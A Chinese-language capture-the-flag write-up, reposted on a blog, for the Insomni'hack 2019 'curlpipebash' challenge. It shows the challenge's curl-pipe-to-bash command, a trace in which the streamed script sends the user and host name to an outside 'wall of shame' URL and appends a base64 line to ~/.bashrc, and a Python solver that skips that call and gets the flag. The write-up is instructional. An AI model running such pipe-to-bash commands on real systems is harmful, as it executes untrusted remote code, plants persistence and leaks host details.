Insomni'hack teaser 2019 - Misc - curlpipebash
生活随笔
收集整理的這篇文章主要介紹了
Insomni'hack teaser 2019 - Misc - curlpipebash
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
參考鏈接
https://ctftime.org/task/7454
題目
Welcome to Insomni'hack teaser 2019!
Execute this Bash command to print the flag :)
curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash
解題過(guò)程
curl請(qǐng)求的是一個(gè)stream get,對(duì)方會(huì)不斷發(fā)來(lái)數(shù)據(jù)在本地執(zhí)行
root@vultr:~# curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash -x + bash + curl -Ns https://curlpipebash.teaser.insomnihack.ch/03280bf1-7492-4fce-bbcf-617e5a17646a + base64 -d ++ whoami ++ hostname + curl -Ns https://curlpipebash.teaser.insomnihack.ch/03280bf1-7492-4fce-bbcf-617e5a17646a/add-to-wall-of-shame/root%40vultr.guest + echo 'Welcome to the wall of shame!' Welcome to the wall of shame!這個(gè)鏈接https://curlpipebash.teaser.insomnihack.ch/UUID/add-to-wall-of-shame/$(whoami)%40$(hostname)看著就很氣人
要獲得flag,只需要阻止執(zhí)行或者延遲執(zhí)行curl -Ns https://curlpipebash.teaser.insomnihack.ch/UUID/add-to-wall-of-shame/$(whoami)%40$(hostname)就行了
import requestsheaders = {"User-Agent": "curl/7.61.0" # if it looks like curl and talks like curl... }def main():url = "https://curlpipebash.teaser.insomnihack.ch/print-flag.sh"r = requests.get(url, headers=headers, stream=True)for l in r.iter_lines():print("print-flag got line: {}".format(l))if "curl" in l and "shame" not in l: # We want to curl all new urls, but not the wall of shame one!new_link = l.split(" ")[2] # who needs regex?..print("Requesting new url: {}".format(new_link))requests.get(new_link, headers=headers)if __name__ == "__main__":main()執(zhí)行結(jié)果如下
# python get-flag.py print-flag got line: curl -Ns https://curlpipebash.teaser.insomnihack.ch/c69b5fdc-cfab-48d5-a130-8925dfdd2d26 | bash Requesting new url: https://curlpipebash.teaser.insomnihack.ch/c69b5fdc-cfab-48d5-a130-8925dfdd2d26 print-flag got line: base64 -d >> ~/.bashrc <<< ZXhwb3J0IFBST01QVF9DT01NQU5EPSdlY2hvIFRIQU5LIFlPVSBGT1IgUExBWUlORyBJTlNPTU5JSEFDSyBURUFTRVIgMjAxOScK print-flag got line: curl -Ns https://curlpipebash.teaser.insomnihack.ch/c69b5fdc-cfab-48d5-a130-8925dfdd2d26/add-to-wall-of-shame/$(whoami)%40$(hostname) print-flag got line: INS{Miss me with that fishy pipe}轉(zhuǎn)載于:https://www.cnblogs.com/Antiver/p/10299826.html
總結(jié)
以上是生活随笔為你收集整理的Insomni'hack teaser 2019 - Misc - curlpipebash的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: Linux的vim编辑器中的翻页命令
- 下一篇: cocos creator基础-创建WX